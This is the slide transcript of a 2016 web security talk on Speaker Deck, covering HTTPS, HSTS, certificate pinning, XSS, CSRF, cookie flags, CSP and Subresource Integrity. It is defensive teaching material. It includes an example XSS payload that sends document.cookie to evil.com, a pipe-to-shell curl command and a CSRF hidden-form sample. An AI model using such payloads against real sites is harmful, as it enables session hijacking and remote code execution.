Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Platform Security

Jérémy Courtial
October 26, 2016
Programming
0
46

Web Platform Security

Jérémy Courtial

October 26, 2016
Tweet

More Decks by Jérémy Courtial

See All by Jérémy Courtial
sudo give the cloud
mrartichaut
0
25
An introduction to AppSec?
mrartichaut
0
43
Secure by design: introduction to threat modeling
mrartichaut
0
51
Taming secrets with Vault
mrartichaut
0
81
Lead Tech: Empowering the team
mrartichaut
0
45
go doSomeThing()
mrartichaut
0
51
Practical Cryptography : Data Encryption
mrartichaut
0
58
Practical Cryptography : Password Hashing
mrartichaut
1
71
HTTP/2 : One connection to rule them all
mrartichaut
1
59

Other Decks in Programming

See All in Programming
SwiftUI Viewの責務分離
elmetal
PRO
1
220
お前もAI鬼にならないか?👹Bolt & Cursor & Supabase & Vercelで人間をやめるぞ、ジョジョー!👺
taishiyade
5
3.9k
もう僕は OpenAPI を書きたくない
sgash708
3
990
CloudNativePGがCNCF Sandboxプロジェクトになったぞ! 〜CloudNativePGの仕組みの紹介〜
nnaka2992
0
220
2024年のWebフロントエンドのふりかえりと2025年
sakito
1
240
WebDriver BiDiとは何なのか
yotahada3
1
140
パスキーのすべて ── 導入・UX設計・実装の紹介 / 20250213 パスキー開発者の集い
kuralab
3
730
密集、ドキュメントのコロケーション with AWS Lambda
satoshi256kbyte
0
190
Djangoアプリケーション 運用のリアル 〜問題発生から可視化、最適化への道〜 #pyconshizu
kashewnuts
1
240
時計仕掛けのCompose
mkeeda
1
290
チームリードになって変わったこと
isaka1022
0
190
Spring gRPC について / About Spring gRPC
mackey0225
0
220

Featured

See All Featured
We Have a Design System, Now What?
morganepeng
51
7.4k
Unsuck your backbone
ammeep
669
57k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
28
9.3k
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
marktimemedia
29
2.2k
4 Signs Your Business is Dying
shpigford
182
22k
The Pragmatic Product Professional
lauravandoore
32
6.4k
Gamification - CAS2011
davidbonilla
80
5.1k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
45
2.3k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
233
17k
What’s in a name? Adding method to the madness
productmarketing
PRO
22
3.3k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
231
53k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k

Transcript

  1. Web Platform Security Leveling up Jérémy Courtial Software Security Architect

  2. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin.

  3. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Rootkit ?

  4. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Malware ?

  5. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Trojan ?

  6. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Browser /ˈbraʊ.zɚ/

  7. http://yolo.com Go!

  8. curl -s http://yolo.com | sh VS http://yolo.com Go!

  9. Browser : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from unknown origin.

  10. Unknown origin

  11. Unknown origin Unsecure

  12. What is anyway ? www.google.com

  13. What is anyway ? www.oodrive.com

  14. What is anyway ? www.lol-cats.com

  15. What is anyway ? 172.217.20.46

  16. Unsecure origin

  17. Unsecure origin

  18. Transport Layer Security

  19. Confidentiality Integrity Authentication

  20. Other incentives "The green lock™"

  21. Other incentives HTTP/2

  22. Other incentives "Secure origins only" features

  23. http https

  24. GET /

  25. GET / 302 Found Location: https://yolo.com

  26. GET / 302 Found Location: https://yolo.com

  27. None
  28. None

  29. 302 Found

  30. 302 Found

  31. 302 Found

  32. HTTP Strict Transport Security

  33. Strict-Transport-Security :

  34. max-age=31536000; Strict-Transport-Security :

  35. includeSubdomains; max-age=31536000; Strict-Transport-Security :

  36. http://yolo.com

  37. http://yolo.com 307 Internal Redirect

  38. https://yolo.com 307 Internal Redirect

  39. 307 Internal Redirect GET / https://yolo.com

  40. Trust failure

  41. TLS certificates are based on trust

  42. Oh… trust … That's cute …

  43. Trust-based systems don't have a good reliability record …

  44. Certificate Authority failures Bad captive portal Every "Internal CA"

  45. You've failed me for the last time

  46. HTTP Certificate Pinning

  47. Public-Key-Pins:

  48. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM=";

  49. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g=";

  50. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

  51. max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

  52. includeSubDomains; max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

  53. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from unknown origin.

  54. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from secured origins.

  55. Unknown code

  56. XSS <h1>Hello, ${username}</h1>

  57. XSS $username = "<img src=evil.com?cookies=" + document.cookie + "/>"

  58. XSS <h1>Hello, <img src="evil.com?cookies =JSESSIONID=5FZ4DS…" /> </h1>

  59. CSRF https://evil.com Click here!

  60. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

  61. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

  62. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

  63. Everybody love cookies !

  64. Rename Cookie to Spinach ?

  65. Rename Cookie to Spinach ? Brussel Sprout ?

  66. REJECTED

  67. Locking the cookie jar

  68. Set-Cookie : JSESSIONID=12345;

  69. Set-Cookie : JSESSIONID=12345; secure;

  70. Set-Cookie : JSESSIONID=12345; secure; HttpOnly;

  71. Set-Cookie : JSESSIONID=12345; sameSite = strict | lax; secure; HttpOnly;

  72. Content Security Policy

  73. Content-Security-Policy

  74. : default-src 'none'; script-src 'self' 'api.google.com'; style-src … ; form-src

    … ; connect-src …; Content-Security-Policy

  75. : … report-uri …; script-src 'strict-dynamic' …; upgrade-insecure-requests; … Content-Security-Policy

  76. Our data (cookies, assets) are locked. What about third parties

    ?

  77. HTML JS JPG

  78. CDN HTML JS JPG JS JPG

  79. CDN HTML JS JPG JS JPG

  80. CDN HTML JS JPG JS JPG

  81. CDN HTML JS JPG JS JPG

  82. Subresource Integrity

  83. <script src="https://example.com/framework.js" > </script>

  84. <script src="https://example.com/framework.js" </script> integrity="sha384-oqVuAfXR….Y8wC">

  85. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from secured origins Browser unknown code

  86. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from secured origins Browser trusted code

  87. Many more Suborigins iframe sandboxing Credentials Management

  88. https://www.w3.org/2011/webappsec/ @mikewest

  89. Times have changed

  90. Times have changed "secured" is the new default secured

  91. What does secured means ? secured Least Privilege Authentication Integrity

  92. Is our platform ? secured

  93. Thank you Icons from Ismael Ruiz, Konstantin Velichko, Rémy Médard,

    unlimicon (The Noun Project) and design.google.com/icons/